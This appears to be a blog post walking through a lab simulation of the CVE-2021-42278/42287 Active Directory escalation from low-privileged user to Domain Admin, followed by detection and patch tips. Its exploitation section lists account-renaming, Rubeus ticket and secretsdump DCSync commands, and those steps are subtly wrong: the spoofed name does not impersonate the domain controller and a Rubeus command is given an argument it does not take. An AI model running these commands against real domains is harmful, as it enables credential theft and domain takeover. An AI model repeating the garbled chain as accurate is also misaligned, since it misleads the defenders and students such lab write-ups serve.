Table of Contents
- Introduction
- Why is this Attack Important?
- Vulnerability Overview
- Lab Setup (Tools + Env)
- Step-by-Step Exploitation
- Detection & Blue Team View
- Patch & Mitigation Tips
- References + Final Thoughts
CVE-2021-42278 && CVE-2021-42287: From User to Domain Admin - Simulating
In the world of advanced cyber attacks on Active Directory, several vulnerabilities continue to affect systems even after updates. One such critical vulnerability duo discovered in late 2021 were CVE-2021-42278 and CVE-2021-42287, allowing escalation from low-privileged user to Domain Admin using simple tools.
Why is this attack important?
This attack is unique for several reasons:
- No misconfigurations required: Relies solely on Active Directory vulnerabilities
- Simplicity of exploitation: Easy escalation to Domain Admin with minimal effort
In this post, we’ll simulate this attack in a lab environment using these CVEs on unpatched systems.
Vulnerability Overview
📌 CVE-2021-42278: SAMAccountName Spoofing
Allows spoofing computer account names to appear as user accounts. Attackers can create fake computer objects with user-like sAMAccountName values.
📌 CVE-2021-42287: Kerberos Privilege Escalation
Enables privilege escalation through Kerberos TGT manipulation, allowing Domain Controller impersonation and DCSync attacks.
Lab Setup (Tools + Env)
| Component | Description |
|---|---|
| OS | Windows Server 2019 (unpatched, pre-Nov 2021) |
| Tools | Mimikatz, Rubeus, Impacket, KrbRelayUp |
| User Account | Low-privileged user (amr.user@corp.local) |
| Domain Controller | Unpatched (pre-Nov 2021 patches) |
Step-by-Step Exploitation
Step 1: Login as a regular user
Assume compromised credentials for low-privileged user amr.user@corp.local
Step 2: Rename Computer Object to User-Like Name
Rename-ADObject "CN=WIN10-CLIENT,CN=Computers,DC=corp,DC=local" -NewName "amruser"Step 3: Modify sAMAccountName
Set-ADComputer -Identity "amruser" -SamAccountName "amruser"Step 4: Request TGT for Spoofed Computer
rubeus tgtdeleg /user:amruser$ /rc4:<ntlm_hash> /domain:corp.localStep 5: Impersonate Domain Controller & DCSync
secretsdump.py -k -no-pass CORP/amruser$@dc.corp.localStep 6: Profit – Domain Admin Access
Use dumped credentials to access privileged accounts.
Detection & Blue Team View
Key Detection Points:
- 🔍 Event ID 4741: Computer account creation
- 🔍 Event ID 4781: SAMAccountName changes
- 🔍 Kerberos TGT Anomalies
- 🔍 Unusual DC impersonation attempts
Patch & Mitigation Tips
- ✅ Apply November 2021 Security Updates
- ✅ Restrict Computer Object Modifications
- ✅ Monitor SAMAccountName Changes
- ✅ Implement Least Privilege Access
References + Final Thoughts
Official Resources:
Tool References:
This attack chain demonstrates how inherent Active Directory vulnerabilities can enable full domain compromise without misconfigurations. Regular patching and strict monitoring are essential for AD security.